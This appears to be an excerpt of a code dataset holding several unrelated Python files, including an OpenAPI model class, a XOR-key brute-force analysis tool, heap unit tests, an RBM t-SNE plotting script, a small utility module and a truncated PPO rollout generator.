The value is a dict\n that stores validations for max_length, min_length, max_items,\n min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,\n inclusive_minimum, and regex.\n additional_properties_type (tuple): A tuple of classes accepted\n as additional properties values.\n \"\"\"\n\n allowed_values = {}\n\n validations = {}\n\n additional_properties_type = None\n\n @staticmethod\n def openapi_types():\n \"\"\"\n This must be a class method so a model may have properties that are\n of type self, this ensures that we don't create a cyclic import\n\n Returns\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n \"\"\"\n return {\n \"bt_type\": (str,), # noqa: E501\n \"configuration_value_string\": (str,), # noqa: E501\n \"standard_type_name\": (str,), # noqa: E501\n \"type_tag\": (str,), # noqa: E501\n \"value_object\": (\n bool,\n date,\n datetime,\n dict,\n float,\n int,\n list,\n str,\n ), # noqa: E501\n }\n\n @staticmethod\n def discriminator():\n return {\n \"bt_type\": {\n \"BTFSValueArray-1499\": btfs_value_array1499.BTFSValueArray1499,\n \"BTFSValueString-1422\": btfs_value_string1422.BTFSValueString1422,\n \"BTFSValueWithUnits-1817\": btfs_value_with_units1817.BTFSValueWithUnits1817,\n \"BTFSValueOther-1124\": btfs_value_other1124.BTFSValueOther1124,\n \"BTFSValueTooBig-1247\": btfs_value_too_big1247.BTFSValueTooBig1247,\n \"BTFSValueNumber-772\": btfs_value_number772.BTFSValueNumber772,\n \"BTFSValueUndefined-2003\": btfs_value_undefined2003.BTFSValueUndefined2003,\n \"BTFSValueBoolean-1195\": btfs_value_boolean1195.BTFSValueBoolean1195,\n },\n }\n\n attribute_map = {\n \"bt_type\": \"btType\", # noqa: E501\n \"configuration_value_string\": \"configurationValueString\", # noqa: E501\n \"standard_type_name\": \"standardTypeName\", # noqa: E501\n \"type_tag\": \"typeTag\", # noqa: E501\n \"value_object\": \"valueObject\", # noqa: E501\n }\n\n @staticmethod\n def _composed_schemas():\n return None\n\n required_properties = set(\n [\n \"_data_store\",\n \"_check_type\",\n \"_from_server\",\n \"_path_to_item\",\n \"_configuration\",\n ]\n )\n\n def __init__(\n self,\n _check_type=True,\n _from_server=False,\n _path_to_item=(),\n _configuration=None,\n **kwargs\n ): # noqa: E501\n \"\"\"btfs_value1888.BTFSValue1888 - a model defined in OpenAPI\n\n Keyword Args:\n _check_type (bool): if True, values for parameters in openapi_types\n will be type checked and a TypeError will be\n raised if the wrong type is input.\n Defaults to True\n _path_to_item (tuple/list): This is a list of keys or values to\n drill down to the model in received_data\n when deserializing a response\n _from_server (bool): True if the data is from the server\n False if the data is from the client (default)\n _configuration (Configuration): the instance to use when\n deserializing a file_type parameter.\n If passed, type conversion is attempted\n If omitted no type conversion is done.\n bt_type (str): [optional] # noqa: E501\n configuration_value_string (str): [optional] # noqa: E501\n standard_type_name (str): [optional] # noqa: E501\n type_tag (str): [optional] # noqa: E501\n value_object (bool, date, datetime, dict, float, int, list, str): [optional] # noqa: E501\n \"\"\"\n\n self._data_store = {}\n self._check_type = _check_type\n self._from_server = _from_server\n self._path_to_item = _path_to_item\n self._configuration = _configuration\n\n for var_name, var_value in six.iteritems(kwargs):\n if (\n var_name not in self.attribute_map\n and self._configuration is not 
None\n            and self._configuration.discard_unknown_keys\n                and self.additional_properties_type is None\n            ):\n                # discard variable.\n                continue\n            setattr(self, var_name, var_value)\n\n    @classmethod\n    def get_discriminator_class(cls, from_server, data):\n        \"\"\"Returns the child class specified by the discriminator\"\"\"\n        discriminator = cls.discriminator()\n        discr_propertyname_py = list(discriminator.keys())[0]\n        discr_propertyname_js = cls.attribute_map[discr_propertyname_py]\n        if from_server:\n            class_name = data[discr_propertyname_js]\n        else:\n            class_name = data[discr_propertyname_py]\n        class_name_to_discr_class = discriminator[discr_propertyname_py]\n        return class_name_to_discr_class.get(class_name)\n","sub_path":"python/onshape_client/oas/models/btfs_value1888.py","file_name":"btfs_value1888.py","file_ext":"py","file_size_in_byte":8521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"206213776","text":"import numpy as np\n\n# Read In MSD Data From TXT Files\n# Data From : https://archive.ics.uci.edu/ml/datasets/YearPredictionMSD\nmsd_data = np.genfromtxt('./YearPredictionMSD.txt', delimiter=',')\n\n\n# Subset Into Training and Testing Data\ntrain_data = msd_data[0:463715, :]\ntest_data = msd_data[463715:, :]\n\n# Convert To npz\nnp.savez('./msd_data.npz', train_data=train_data, test_data=test_data)\n","sub_path":"sample_data/msd/convert_csv_to_npz.py","file_name":"convert_csv_to_npz.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"399968136","text":"'''\nxorAscii v20140727 - John Moran (john@jtmoran.com)\n\nxorAscii iterates through each XOR key and outputs the percentage of \nASCII bytes returned, the longest ASCII string returned and the number of \nASCII strings returned that are at least 5 characters long. It will also print \nthe resulting output if specified. 
This code is currently experimental.\n \nOptions:\n \n    -f, --file       XOR encrypted file\n    -o, --offset     Offset to begin in bytes (Default: 0)\n    -l, --length     Length to read in bytes (Default: 100)\n    -x, --xorlen     XOR key length in bytes (1 or 2, Default: 1)\n    -t, --threshold  Minimum % ASCII characters to print\n    -p, --print      Print Hex and ASCII view of XOR'd data\n    -h, --help       Show help'''\n\nimport os\nimport getopt\nimport sys\nfrom string import ascii_letters, digits, punctuation\n \n#XOR data \ndef xor(data, key):\n    l = len(key)\n    return bytearray(((data[i] ^ key[i % l]) for i in range(0,len(data))))\n\n#Print data in hex view\ndef bufferToHex(buffer, start, count):\n    accumulator = ''\n    for item in range(count):\n        accumulator += '%02X' % buffer[start + item] + ' '\n    return accumulator\n\n#Print data in ascii view\ndef bufferToAscii(buffer, start, count):\n    accumulator = ''\n    for item in range(count):\n        char = chr(buffer[start + item])\n        if char in ascii_letters or char in digits or char in punctuation or char == ' ':\n            accumulator += char\n        else:\n            accumulator += '.'\n    return accumulator\n\ndef printXORData(xorData):\n    index = 0\n    size = 16\n    bytesRead = len(xorData)\n    hexFormat = '{:'+str(size*3)+'}'\n    asciiFormat = '{:'+str(size)+'}'\n    print(\"--------------------------------------------------------------------\")\n    while index < bytesRead:\n        hex = bufferToHex(xorData, index, size)\n        ascii = bufferToAscii(xorData, index, size)\n        print(hexFormat.format(hex), end='')\n        print('|',asciiFormat.format(ascii),'|')\n        index += size\n        if bytesRead - index < size:\n            size = bytesRead - index\n    print(\"--------------------------------------------------------------------\")\n    \ndef main(argv):\n    #Get command line options\n    threshold = 60\n    length = 100\n    offset = 0\n    xorlen = 1\n    printData = 0\n    xorbits = 2 ** (int(xorlen) * 8)\n    try:\n        opts, args = getopt.getopt(argv, \"f:x:o:l:t:ph\", [\"file=\", \"xorlen=\", \"offset=\", \"length=\", \"threshold=\", \"print\", \"help\"])\n    except getopt.GetoptError:\n        print(__doc__)\n        sys.exit(2)\n    optsDict = dict(opts)\n    if \"-f\" not in optsDict:\n        print(\"Error: File name required!\")\n        print(__doc__)\n        raise SystemExit\n    for opt, arg in opts:\n        #Help\n        if opt in (\"-h\", \"--help\"):\n            print(__doc__)\n            raise SystemExit\n        #File\n        if opt in (\"-f\", \"--file\"):\n            fname = arg\n        #Length\n        if opt in (\"-l\", \"--length\"):\n            try:\n                length = int(arg)\n            except ValueError:\n                print(\"Error: Invalid length!\")\n                print(__doc__)\n                raise SystemExit\n        #Offset\n        if opt in (\"-o\", \"--offset\"):\n            try:\n                offset = int(arg)\n            except ValueError:\n                print(\"Error: Invalid offset!\")\n                print(__doc__)\n                raise SystemExit\n        #Threshold\n        if opt in (\"-t\", \"--threshold\"):\n            try:\n                threshold = int(arg)\n            except ValueError:\n                print(\"Error: Invalid threshold!\")\n                print(__doc__)\n                raise SystemExit\n        #Print Data\n        if opt in (\"-p\", \"--print\"):\n            printData = 1\n        #Key Length\n        if opt in (\"-x\", \"--xorlen\"):\n            try:\n                xorlen = int(arg)\n            except ValueError:\n                print(\"Error: Invalid XOR key length!\")\n                print(__doc__)\n                raise SystemExit\n            if xorlen < 1 or xorlen > 2:\n                print(\"Error: XOR key length must be between 1 and 2!\")\n                print(__doc__)\n                raise SystemExit\n            xorbits = 2 ** (xorlen * 8)\n    print(\"xorAscii v20140727\")\n    try:\n        fh = open(fname, \"rb\")\n    except IOError:\n        print(\"Error: Unable to open '\" + fname + \"'\")\n        print(__doc__)\n        raise SystemExit\n    #Make sure length and offset are valid\n    finfo = os.stat(fname)\n    if (finfo.st_size < int(length) + int(offset)):\n        print(\"Error: Length or offset too large! 
Read past EOF\")\n        raise SystemExit\n    else:\n        fh.seek(offset)\n        b = bytearray(fh.read(length))\n    hexrange = []\n    asciiChrs = []\n    #Add 0-9\n    for a in range(48,58):\n        asciiChrs.append(a)\n    #Add A-Z\n    for a in range(65,91):\n        asciiChrs.append(a)\n    #Add a-z\n    for a in range(97,123):\n        asciiChrs.append(a)\n    for i in range(0,xorbits):\n        hexrange.append(i)\n    print(\"--------------------------------------------------------------------\")\n    print(\"|{0:^15}|{1:^15}|{2:^15}|{3:^18}|\".format(\"XOR Key\", \"% ASCII Bytes\", \"Longest ASCII\", \"# ASCII Strings\"))\n    print(\"|{0:^15}|{1:^15}|{2:^15}|{3:^18}|\".format(\"\", \"\", \"String\", \"Longer 5 Chr\"))\n    print(\"--------------------------------------------------------------------\")\n    for h in hexrange:\n        tmpCnt = 0\n        longest = 0\n        over4 = 0\n        if xorlen == 1:\n            hexStr = \"%#0.2x\" % h\n            h1 = int(hexStr[2:4],16)\n            key = bytearray([h1])\n            xorData = xor(b, key)\n            asciiCount = 0\n            dataLen = len(xorData)\n            for x in xorData:\n                if x in asciiChrs:\n                    asciiCount += 1\n                    tmpCnt += 1\n                else:\n                    if tmpCnt > longest: longest = tmpCnt\n                    if tmpCnt > 4: over4 += 1\n                    tmpCnt = 0\n            #Flush a run of ASCII bytes that reaches the end of the data\n            if tmpCnt > longest: longest = tmpCnt\n            if tmpCnt > 4: over4 += 1\n            perAscii = (asciiCount/dataLen) * 100\n            if perAscii >= threshold:\n                print(\"|{0:^15}|{1:^15.0f}|{2:^15}|{3:^18}|\".format(hexStr, perAscii, longest, over4))\n                if printData: printXORData(xorData)\n        else:\n            hexStr = \"%#0.4x\" % h\n            h1 = int(hexStr[2:4],16)\n            h2 = int(hexStr[4:6],16)\n            key = bytearray([h1, h2])\n            xorData = xor(b, key)\n            asciiCount = 0\n            dataLen = len(xorData)\n            for x in xorData:\n                if x in asciiChrs:\n                    asciiCount += 1\n                    tmpCnt += 1\n                else:\n                    if tmpCnt > longest: longest = tmpCnt\n                    if tmpCnt > 4: over4 += 1\n                    tmpCnt = 0\n            #Flush a run of ASCII bytes that reaches the end of the data\n            if tmpCnt > longest: longest = tmpCnt\n            if tmpCnt > 4: over4 += 1\n            perAscii = (asciiCount/dataLen) * 100\n            if perAscii >= threshold:\n                print(\"|{0:^15}|{1:^15.0f}|{2:^15}|{3:^18}|\".format(hexStr, perAscii, longest, over4))\n                if printData: printXORData(xorData)\n    print(\"--------------------------------------------------------------------\")\nif __name__ == \"__main__\":\n    main(sys.argv[1:])\n    \n\n","sub_path":"xorAscii.py","file_name":"xorAscii.py","file_ext":"py","file_size_in_byte":7100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"68004256","text":"# Name: Jeffery Ho\r\n# Section: 202 - 11\r\n\r\nimport unittest\r\nfrom heap_lab import *\r\n\r\nclass TestList(unittest.TestCase):\r\n    def test_insert(self):\r\n        heap1 = MaxHeap(6)\r\n        heap1.heap = [0,5,4,3,2]\r\n        heap1.size = 4\r\n        heap1.insert(1)\r\n        result1 = MaxHeap(6)\r\n        result1.size = 5\r\n        result1.heap = [0,5,4,3,2,1]\r\n        self.assertEqual(heap1, result1)\r\n        self.assertTrue(heap1.insert(0))\r\n        self.assertFalse(heap1.insert(10))\r\n\r\n\r\n    def test_find_max(self):\r\n        heap1 = MaxHeap(6)\r\n        heap1.heap = [0,5,4,3,2]\r\n        heap1.size = 4\r\n        heap2 = MaxHeap(6)\r\n        self.assertEqual(heap1.find_max(), 5)\r\n        self.assertFalse(heap2.find_max())\r\n\r\n    def test_del_max(self):\r\n        heap1 = MaxHeap(6)\r\n        heap1.heap = [0,5,4,3,2]\r\n        heap1.size = 4\r\n        heap2 = MaxHeap(6)\r\n        heap2.size = 3\r\n        heap2.heap = [0,4,2,3]\r\n        heap3 = MaxHeap(6)\r\n        self.assertEqual(heap1.del_max(), 5)\r\n        self.assertEqual(heap3.del_max(), None)\r\n\r\n    def test_heap_contents(self):\r\n        heap1 = MaxHeap(6)\r\n        heap1.heap = [0,5,4,3,2]\r\n        heap1.size = 4\r\n        self.assertEqual(heap1.heap_contents(), [0,5,4,3,2])\r\n\r\n    def test_build_heap(self):\r\n        heap1 = MaxHeap(6)\r\n        heap1.heap = [0,5,3,4,2]\r\n        heap1.size = 4\r\n        alist = [2,3,4,5]\r\n        heap2 = MaxHeap(6)\r\n        heap3 = MaxHeap(3)\r\n        self.assertTrue(heap2.build_heap(alist))\r\n        
self.assertTrue(heap2 == heap1)\r\n self.assertFalse(heap3.build_heap(alist))\r\n\r\n def test_is_empty(self):\r\n heap1 = MaxHeap(6)\r\n self.assertTrue(heap1.is_empty())\r\n heap1.insert(1)\r\n self.assertFalse(heap1.is_empty())\r\n\r\n def test_is_full(self):\r\n heap1 = MaxHeap(1)\r\n self.assertFalse(heap1.is_full())\r\n heap1.insert(1)\r\n self.assertTrue(heap1.is_full())\r\n\r\n def test_get_heap_cap(self):\r\n heap1 = MaxHeap(1)\r\n self.assertEqual(heap1.get_heap_cap(), 1)\r\n\r\n def test_get_heap_size(self):\r\n heap1 = MaxHeap(1)\r\n self.assertEqual(heap1.get_heap_size(), 0)\r\n\r\n def test_perc_down(self):\r\n alist = [2,3,4,5]\r\n heap1 = MaxHeap(6)\r\n heap1.build_heap(alist)\r\n self.assertEqual(heap1.heap, [0,5,3,4,2])\r\n\r\n def test_perc_up(self):\r\n heap1 = MaxHeap(6)\r\n heap1.heap = [0,5,2,4,1]\r\n heap1.size = 4\r\n heap1.insert(3)\r\n self.assertEqual(heap1.heap, [0,5,3,4,1,2])\r\n\r\n def test_heap_sort_increase(self):\r\n heap1 = MaxHeap()\r\n alist = [1,2,3,4,5,6]\r\n self.assertEqual(heap1.heap_sort_increase(alist), [0,1,2,3,4,5,6])\r\n\r\nif __name__ == '__main__': \r\n unittest.main()\r\n","sub_path":"Lab 7/heap_lab_tests.py","file_name":"heap_lab_tests.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"157383987","text":"\n# coding: utf-8\n\n# In[120]:\n\n\nimport numpy as np \nimport pandas as pd \nimport sys \nimport os \nimport pickle \nimport matplotlib.pyplot as plt\nfrom sklearn.manifold import TSNE\n\n\n# In[121]:\n\n\ndef saveObject(obj,name): \n pickle.dump(obj,open( \"tsne/\"+name+\".pkl\", \"wb\" ))\n\ndef loadObject(name):\n obj = pickle.load( open( \"tsne/\"+name+\".pkl\", \"rb\" ) )\n return obj\n\n\n# In[122]:\n\n\nBintestFeatures = loadObject(\"BintestFeatures\")\nBintestLabels = loadObject(\"BintestLabels\")\n\n\n# In[123]:\n\n\n\n\n(test_row,test_col) = (np.shape(BintestFeatures)) #Validation Operation\n(t_row) = (np.shape(BintestLabels)) #Validation Operation\n\n\n# In[124]:\n\n\n#BintestFeatures[0]\n\n\n# In[125]:\n\n\nnp.random.seed(1234)\nk = 1\nnum_hidden = 3\nnum_visible = 784\nlr = 0.001\nepoch = 0\n\n\n# In[126]:\n\n\nnp_rng = np.random.RandomState(1234)\n\n\n# In[127]:\n\n\ndef sigmoid(x):\n return 1. 
/ (1 + np.exp(-x))\n\n\ndef test(point,W,b,c):\n hid = sigmoid(np.dot(point,W) + b)\n re = sigmoid(np.dot(hid,W.T) + c)\n return re\n\n\n# # MAiN CODE\n\n# In[128]:\n\n\nprint(\"Here the testing starts, please check k and epoch \")\n\n[W,b,c] = loadObject(str(num_hidden))\nabstract = test(BintestFeatures,W,b,c)\nsaveObject(abstract,'abstract_hid_'+str(num_hidden))\n\n\n# In[129]:\n\n\n#Extract data\n\n# abstract = np.zeros([points,dim])\n# abstract = loadObject('abstract_hid_'+str(num_hidden)+'_itr_'+str(epoch)+'_k_'+str(k)+'_lr_'+str(lr))\n\n\n# In[130]:\n\n\n#Extract label\n# BintestLabels = np.zeros([points,1])\n# BintestLabels = loadObject('BintrainLabels')\n\n\n# In[131]:\n\n\nfeat_cols = [ 'pixel'+str(i) for i in range(784) ]\n\ndf = pd.DataFrame(abstract,columns=feat_cols)\ndf['label'] = BintestLabels\ndf['label'] = df['label'].apply(lambda i: str(i))\n\n\n# In[144]:\n\n\nrndperm = np.random.permutation(df.shape[0])\n\nn_sne = 10000 # since we have 10000 test images \n\ntsne = TSNE(n_components=2, verbose=0, perplexity=40, n_iter=250,learning_rate=100.0)\ntsne_results = tsne.fit_transform(df.loc[rndperm[:n_sne],feat_cols].values)\n\ndf_tsne = df.loc[rndperm[:n_sne],:].copy()\ndf_tsne['x-tsne'] = tsne_results[:,0]\ndf_tsne['y-tsne'] = tsne_results[:,1]\n\n\nsaveObject(df_tsne,'tsnehid_'+str(num_hidden))\n\n\n# In[145]:\n\n\nfrom ggplot import *\n\n\n# In[147]:\n\n\nchart = ggplot( df_tsne, aes(x='x-tsne', y='y-tsne', color='label') ) + geom_point(size=70,alpha=0.1) + ggtitle(\"k = \"+str(num_hidden)+\" tsne\")\nchart\n\nchart.save(str(num_hidden)+\"32\"+\".pdf\")\n\n\n# In[38]:\n\n\n\n\n","sub_path":"testingRBM.py","file_name":"testingRBM.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"558297472","text":"# -*- python -*-\n## -----------------------------------------------------------------------\n## Intent: This module contains general helper methods\n## -----------------------------------------------------------------------\n\n# -----------------------------------------------------------------------\n# Copyright 2022 Open Networking Foundation (ONF) and the ONF Contributors\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# -----------------------------------------------------------------------\n\n##-------------------##\n##---] IMPORTS [---##\n##-------------------##\nimport sys\nimport pprint\n\n## ---------------------------------------------------------------------------\n## ---------------------------------------------------------------------------\ndef iam():\n \"\"\"Return name of a called method.\"\"\"\n\n func_name = sys._getframe(1).f_code.co_name # pylint: disable=protected-access\n iam = \"%s::%s\" % (__name__, func_name)\n return iam\n\n## -----------------------------------------------------------------------\n## Intent: Display a message then exit with non-zero status.\n## This method cannot be intercepted by try/except\n## 
-----------------------------------------------------------------------\ndef error(msg, exit_with=None, fatal=None):\n    \"\"\"Display a message then exit with non-zero status.\n\n    :param msg: Error message to display.\n    :type msg: string\n\n    :param exit_with: Shell exit status.\n    :type exit_with: int, optional (default=2)\n\n    :param fatal: When true raise an exception.\n    :type fatal: bool (default=False)\n\n    \"\"\"\n\n    if exit_with is None:\n        exit_with = 2\n\n    if fatal is None:\n        fatal = False\n\n    if msg:\n        if fatal:\n            raise Exception(\"ERROR: %s\" % msg)\n        else:\n            print(\"\")\n            print(\"ERROR: %s\" % msg)\n\n    sys.exit(exit_with)\n\n# EOF\n","sub_path":"scripts/flog/main/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"309627771","text":"from baselines.common import Dataset, explained_variance, fmt_row, zipsame\nfrom baselines import logger\nimport baselines.common.tf_util as U\nimport tensorflow as tf, numpy as np\nimport time\nfrom baselines.common.mpi_adam import MpiAdam\nfrom baselines.common.mpi_moments import mpi_moments\nfrom mpi4py import MPI\nfrom collections import deque\nimport os\nimport json\nimport pickle\n\ndef traj_segment_generator(pi, env, horizon, stochastic, num_parallel, num_cpu, rank, ob_size, ac_size, com):\n    t = 0\n    ac = env.action_space.sample() # not used, just so we have the datatype\n    if num_parallel == 0:\n        new = True # marks if we're on first timestep of an episode\n        ob = env.reset()\n\n        cur_ep_ret = 0 # return in current episode\n        cur_ep_len = 0 # len of current episode\n        ep_rets = [] # returns of completed episodes in this segment\n        ep_lens = [] # lengths of ...\n\n        # Initialize history arrays\n        obs = np.array([ob for _ in range(horizon)])\n        rews = np.zeros(horizon, 'float32')\n        vpreds = np.zeros(horizon, 'float32')\n        news = np.zeros(horizon, 'int32')\n        acs = np.array([ac for _ in range(horizon)])\n        prevacs = acs.copy()\n\n        while True:\n            prevac = ac\n            ac, vpred = pi.act(stochastic, ob)\n            # Slight weirdness here because we need value function at time T\n            # before returning segment [0, T-1] so we get the correct\n            # terminal value\n            if t > 0 and t % horizon == 0:\n                yield {\"ob\" : obs, \"rew\" : rews, \"vpred\" : vpreds, \"new\" : news,\n                    \"ac\" : acs, \"prevac\" : prevacs, \"nextvpred\": vpred * (1 - new),\n                    \"ep_rets\" : ep_rets, \"ep_lens\" : ep_lens}\n                # Be careful!!! 
if you change the downstream algorithm to aggregate\n # several of these batches, then be sure to do a deepcopy\n ep_rets = []\n ep_lens = []\n i = t % horizon\n obs[i] = ob\n vpreds[i] = vpred\n news[i] = new\n acs[i] = ac\n prevacs[i] = prevac\n\n ob, rew, new, _ = env.step(ac)\n rews[i] = rew\n\n cur_ep_ret += rew\n cur_ep_len += 1\n if new:\n ep_rets.append(cur_ep_ret)\n ep_lens.append(cur_ep_len)\n cur_ep_ret = 0\n cur_ep_len = 0\n ob = env.reset()\n t += 1\n elif num_cpu == num_parallel:\n new = True # marks if we're on first timestep of an episode\n\n if rank == 0:\n ob_whole = env.reset()\n #print(\"t = \" + str(t) + \" ob_whole = \" + str(ob_whole))\n ob_flat = np.reshape(ob_whole, num_parallel * ob_size)\n #print(\"Rank = 0 obs_whole = \" + str(ob_whole))\n else:\n ob_flat = None\n ob = np.zeros(ob_size, 'float32')\n com.Scatter(ob_flat, ob, root=0)\n\n #print(\"Rank = \" + str(rank) + \" ob = \" + str(ob))\n #exit(0)\n\n cur_ep_ret = 0 # return in current episode\n cur_ep_len = 0 # len of current episode\n ep_rets = [] # returns of completed episodes in this segment\n ep_lens = [] # lengths of ...\n\n # Initialize history arrays\n obs = np.array([ob for _ in range(horizon)])\n rews = np.zeros(horizon, 'float32')\n vpreds = np.zeros(horizon, 'float32')\n news = np.zeros(horizon, 'int32')\n\n acs = np.zeros((horizon, ac.shape[0]), 'float32')\n prevacs = acs.copy()\n ac = np.zeros(ac.shape[0], 'float32')\n\n vpred_a = np.zeros(1,'float32')\n rew_a = np.zeros(1,'float32')\n new_a = np.zeros(1,'uint8')\n while True:\n prevac = ac\n #ac, vpred = pi.act(stochastic, ob)\n\n if rank == 0:\n ac_whole, vpred_whole = pi.act_parallel(stochastic, ob_whole)\n #print(\"t = \" + str(t) + \" ac_whole = \" + str(ac_whole) + \" vpred_whole = \" + str(vpred_whole))\n ac_flat = np.reshape(ac_whole, num_parallel * ac_size)\n vpred_flat = np.reshape(vpred_whole, num_parallel)\n else:\n ac_flat = None\n vpred_flat = None\n\n com.Scatter(ac_flat, ac, root=0)\n com.Scatter(vpred_flat, vpred_a, root=0)\n vpred = vpred_a[0]\n #print(\"t = \" + str(t) + \" rank = \" + str(rank) + \" ac = \" + str(ac) + \"vpred = \" + str(vpred))\n\n # Slight weirdness here because we need value function at time T\n # before returning segment [0, T-1] so we get the correct\n # terminal value\n if t > 0 and t % horizon == 0:\n yield {\"ob\": obs, \"rew\": rews, \"vpred\": vpreds, \"new\": news,\n \"ac\": acs, \"prevac\": prevacs, \"nextvpred\": vpred * (1 - new),\n \"ep_rets\": ep_rets, \"ep_lens\": ep_lens}\n # Be careful!!! 
if you change the downstream algorithm to aggregate\n # several of these batches, then be sure to do a deepcopy\n ep_rets = []\n ep_lens = []\n i = t % horizon\n obs[i] = ob\n vpreds[i] = vpred\n news[i] = new\n acs[i] = ac\n prevacs[i] = prevac\n #print(\"rank = \" + str(rank)+ \" i = \" + str(i) + \" ob = \" + str(ob))\n if rank == 0:\n ob_whole, rew_whole, new_whole, _ = env.step_parallel(ac_whole)\n #print(\"t = \" + str(t) + \" ob_whole = \" + str(ob_whole) + \" rew_whole = \" + str(rew_whole) + \" new_whole = \" + str(new_whole))\n\n ob_flat = np.reshape(ob_whole, num_parallel * ob_size)\n rew_flat = np.reshape(rew_whole, num_parallel)\n new_flat = np.reshape(new_whole, num_parallel)\n #print(\"t = \" + str(t) + \" ob_flat= \" + str(ob_flat) + \" rew_flat = \" + str(rew_flat) + \" new_flat = \" + str(new_flat))\n else:\n ob_flat = None\n rew_flat = None\n new_flat = None\n\n com.Scatter(ob_flat, ob, root=0)\n com.Scatter(rew_flat, rew_a, root=0)\n rew = rew_a[0]\n com.Scatter(new_flat, new_a, root=0)\n new = new_a[0]\n #print(\"t = \" + str(t) + \" rank = \" + str(rank) + \" ob = \" + str(ob) + \" rew = \" + str(rew)+ \" new = \" + str(new))\n\n rews[i] = rew\n\n cur_ep_ret += rew\n cur_ep_len += 1\n if new:\n ep_rets.append(cur_ep_ret)\n ep_lens.append(cur_ep_len)\n cur_ep_ret = 0\n cur_ep_len = 0\n #ob = env.reset()\n t += 1\n else:\n new = np.ones(num_parallel, 'int32') # marks if we're on first timestep of an episode\n\n ob = env.reset_parallel()\n cur_ep_ret = [0 for _ in range(num_parallel)]\n cur_ep_len = [0 for _ in range(num_parallel)]\n ep_rets = [[] for _ in range(num_parallel)] # returns of completed episodes in this segment\n ep_lens = [[] for _ in range(num_parallel)] # lengths of ...\n\n # Initialize history arrays\n #obs = np.array([[ob for _ in range(horizon)] for __ in range(num_parallel)])\n obs = np.zeros((num_parallel, horizon, ob.shape[1]),'float32')\n rews = np.zeros((num_parallel, horizon), 'float32')\n vpreds = np.zeros((num_parallel, horizon), 'float32')\n news = np.zeros((num_parallel, horizon), 'int32')\n #acs = np.array([[ac for _ in range(horizon)] for __ in range(num_parallel)])\n acs = np.zeros((num_parallel, horizon, ac.shape[0]),'float32')\n prevacs = acs.copy()\n ac = np.zeros((num_parallel, ac.shape[0]),'float32')\n\n while True:\n prevac = ac\n ac, vpred = pi.act_parallel(stochastic, ob)\n #print(\"t = \" + str(t) + \" ac = \" + str(ac) + \" vpred = \" + str(vpred))\n # Slight weirdness here because we need value function at time T\n # before returning segment [0, T-1] so we get the correct\n # terminal value\n if t > 0 and t % horizon == 0:\n obs_all = np.reshape(obs, (horizon * num_parallel,-1))\n rews_all = np.reshape(rews, horizon * num_parallel)\n #for j in range(num_parallel):\n # vpreds[j][horizon] = vpred[j] * (1 - new[j])\n #vpreds_all = np.reshape(vpreds, horizon * num_parallel)\n vpreds_all = vpreds\n news_all = np.reshape(news, horizon * num_parallel)\n acs_all = np.reshape(acs, (horizon * num_parallel, -1))\n prevacs_all = np.reshape(prevacs, (horizon * num_parallel,-1))\n ep_rets_all = [item for sublist in ep_rets for item in sublist]\n ep_lens_all = [item for sublist in ep_lens for item in sublist]\n yield {\"ob\" : obs_all, \"rew\" : rews_all, \"vpred\" : vpreds_all, \"new\" : news_all,\n \"ac\" : acs_all, \"prevac\" : prevacs_all, \"nextvpred\": vpred * (1.0 - new),\n \"ep_rets\" : ep_rets_all, \"ep_lens\" : ep_lens_all}\n # Be careful!!! 
if you change the downstream algorithm to aggregate\n # several of these batches, then be sure to do a deepcopy\n for j in range(num_parallel):\n ep_rets[j] = []\n ep_lens[j] = []\n i = t % horizon\n for j in range(num_parallel):\n obs[j][i] = ob[j]\n vpreds[j][i] = vpred[j]\n news[j][i] = new[j]\n acs[j][i] = ac[j]\n prevacs[j][i] = prevac[j]\n ob, rew, new, _ = env.step_parallel(ac)\n #print(\"t = \" + str(t) + \" ob = \" + str(ob) + \" rew = \" + str(rew) + \" new = \" + str(new))\n for j in range(num_parallel):\n rews[j][i] = rew[j]\n cur_ep_ret[j] += rew[j]\n cur_ep_len[j] += 1\n if new[j]:\n ep_rets[j].append(cur_ep_ret[j])\n ep_lens[j].append(cur_ep_len[j])\n cur_ep_ret[j] = 0\n cur_ep_len[j] = 0\n #ob = env.reset()\n t += 1\n\ndef add_vtarg_and_adv(seg, gamma, lam, horizon, num_parallel, num_cpu):\n \"\"\"\n Compute target value using TD(lambda) estimator, and advantage with GAE(lambda)\n \"\"\"\n if (num_parallel <= 1) or (num_cpu == num_parallel):\n new = np.append(seg[\"new\"], 0) # last element is only used for last vtarg, but we already zeroed it if last new = 1\n vpred = np.append(seg[\"vpred\"], seg[\"nextvpred\"])\n T = len(seg[\"rew\"])\n seg[\"adv\"] = gaelam = np.empty(T, 'float32')\n rew = seg[\"rew\"]\n lastgaelam = 0\n for t in reversed(range(T)):\n nonterminal = 1 - new[t+1]\n delta = rew[t] + gamma * vpred[t+1] * nonterminal - vpred[t]\n gaelam[t] = lastgaelam = delta + gamma * lam * nonterminal * lastgaelam\n\n else:\n #vpred = np.reshape(np.concatenate((seg[\"vpred\"], np.reshape(seg[\"nextvpred\"], (num_parallel,1)) ), axis=1), (horizon + 1) * num_parallel)\n new = seg[\"new\"]\n vpred = seg[\"vpred\"] = np.reshape(seg[\"vpred\"], horizon * num_parallel)\n T = len(seg[\"rew\"])\n seg[\"adv\"] = gaelam = np.empty(T, 'float32')\n rew = seg[\"rew\"]\n lastgaelam = 0\n for t in reversed(range(T)):\n if t % horizon 